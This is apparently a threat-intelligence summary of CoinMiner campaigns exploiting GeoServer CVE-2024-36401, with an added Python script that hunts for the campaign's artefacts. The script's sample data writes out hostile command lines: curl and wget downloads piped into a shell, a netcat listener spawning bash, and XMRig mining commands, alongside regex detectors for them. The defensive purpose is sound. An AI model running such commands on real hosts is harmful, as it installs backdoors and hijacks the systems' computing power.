CoinMiner Attacks Exploiting GeoServer Vulnerability
Essential information
- Published
- 08/08/2025 17:08
- Modified
- 10/08/2025 21:39
- Tags
- 2025-08-08, CVE-2024-36401, bash, coinminer, condi, geoserver, goreverse, mirai, monero, netcat, powershell, remote code execution, sidewalk, xmrig
- Related entities
- 4 observables, 6 techniques (MITRE ATT&CK), 1 other
Description
A critical remote code execution vulnerability in GeoServer, CVE-2024-36401, is being actively exploited to install CoinMiner malware. The flaw lies in how GeoServer (through the GeoTools library) evaluates property names from OGC requests as XPath expressions via commons-jxpath, which lets an unauthenticated attacker execute arbitrary code on an unpatched server; fixed releases are 2.23.6, 2.24.4 and 2.25.2. The attacks target both Windows and Linux hosts running vulnerable GeoServer installations. In South Korea, attackers exploited the vulnerability to run PowerShell commands that installed NetCat for remote access and XMRig for cryptocurrency mining. The attack chain downloads malicious scripts, terminates competing miners already present on the host, and establishes persistence through cron jobs on Linux. The miner connects to pool.supportxmr.com to mine Monero, and the installed NetCat gives the attackers a channel for further post-exploitation activity beyond mining.

Defenders should confirm that GeoServer is on a fixed release and hunt for the artefacts of this chain: cron entries that fetch and execute remote scripts, xmrig processes or command lines pointing at pool.supportxmr.com, and unexpected netcat listeners or reverse shells.
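The following hunting script is an added example, not code from the original report or from the threat actors. It checks a user crontab and a list of process command lines for the artefacts the description names: XMRig mining against pool.supportxmr.com, NetCat listeners or exec shells, and cron persistence that pipes curl/wget output into a shell. The pool name and tool names come from the report; the sample crontab, process list, IP address (TEST-NET-2 range) and paths are constructed for the example.

```python
"""Hunt for the GeoServer CVE-2024-36401 coinminer chain artefacts.

Added example, not from the original report. Pool and tool names are taken
from the report; all sample data below is constructed.
"""
import re
from dataclasses import dataclass

MINING_POOLS = {"pool.supportxmr.com"}          # named in the report
MINER_NAMES = {"xmrig"}                         # named in the report
NETCAT_NAMES = {"nc", "netcat", "ncat", "nc.traditional"}

# curl/wget output piped straight into a shell: the "download scripts" step
DOWNLOAD_EXEC = re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:ba)?sh\b")
# XMRig-style pool argument: -o host:port, --url=host:port or a stratum URL
POOL_ARG = re.compile(
    r"(?<!\S)(?:-o|--url)[= ]+(?:stratum\+(?:tcp|ssl)://)?([A-Za-z0-9.-]+)(?::\d+)?"
)


@dataclass(frozen=True)
class Finding:
    source: str     # "cron" or "process"
    reason: str
    evidence: str   # the offending command line


def cmd_basename(cmdline):
    """First token of a command line with any directory prefix stripped."""
    parts = cmdline.split()
    return parts[0].rsplit("/", 1)[-1] if parts else ""


def netcat_listen_or_exec(cmdline):
    """Heuristic: short flags containing l/e/c (listen, exec) or ncat long forms."""
    for tok in cmdline.split()[1:]:
        if tok in {"--listen", "--exec", "--sh-exec"}:
            return True
        if tok.startswith("-") and not tok.startswith("--") and set(tok[1:]) & {"l", "e", "c"}:
            return True
    return False


def check_cmdline(cmdline, source):
    """Return every finding for one command line (a line may trigger several)."""
    findings = []
    base = cmd_basename(cmdline)
    if base in MINER_NAMES:
        findings.append(Finding(source, "known miner binary", cmdline))
    for m in POOL_ARG.finditer(cmdline):
        if m.group(1).lower() in MINING_POOLS:
            findings.append(Finding(source, f"mining pool {m.group(1).lower()}", cmdline))
    if base in NETCAT_NAMES and netcat_listen_or_exec(cmdline):
        findings.append(Finding(source, "netcat listener/exec", cmdline))
    if DOWNLOAD_EXEC.search(cmdline):
        findings.append(Finding(source, "download piped to shell", cmdline))
    return findings


def cron_commands(crontab_text):
    """Yield the command part of each job in a user crontab (no user column)."""
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
            continue                      # blank, comment or VAR=value assignment
        if line.startswith("@"):          # @reboot, @daily, ...
            parts = line.split(None, 1)
            expected = 2
        else:                             # five time fields then the command
            parts = line.split(None, 5)
            expected = 6
        if len(parts) == expected:
            yield parts[-1]


def hunt(crontab_text, process_cmdlines):
    """Run all checks over a crontab dump and a list of process command lines."""
    findings = []
    for cmd in cron_commands(crontab_text):
        findings.extend(check_cmdline(cmd, "cron"))
    for cmd in process_cmdlines:
        findings.extend(check_cmdline(cmd, "process"))
    return findings


# Constructed sample data: one benign and two malicious cron jobs, plus processes.
SAMPLE_CRONTAB = """
# constructed sample crontab
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL http://198.51.100.23/x.sh | bash
@reboot /tmp/.x/xmrig -o pool.supportxmr.com:443 -u WALLET_PLACEHOLDER -k
"""
SAMPLE_PROCESSES = [
    "/usr/lib/jvm/java-11/bin/java -jar /opt/geoserver/start.jar",
    "nc -lvnp 4444 -e /bin/bash",
    "/tmp/.x/xmrig --url=stratum+tcp://pool.supportxmr.com:3333 --user WALLET_PLACEHOLDER --pass x",
    "sshd: root@pts/0",
    "wget -qO- http://198.51.100.23/y.sh | sh",
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_CRONTAB, SAMPLE_PROCESSES):
        print(f"[{f.source}] {f.reason}: {f.evidence}")
```

On a live host, feed `hunt()` the output of `crontab -l` (per user) and the `cmdline` of each entry under `/proc`; the pool and binary names are deliberately kept in small sets so they can be extended with other indicators from the same campaign.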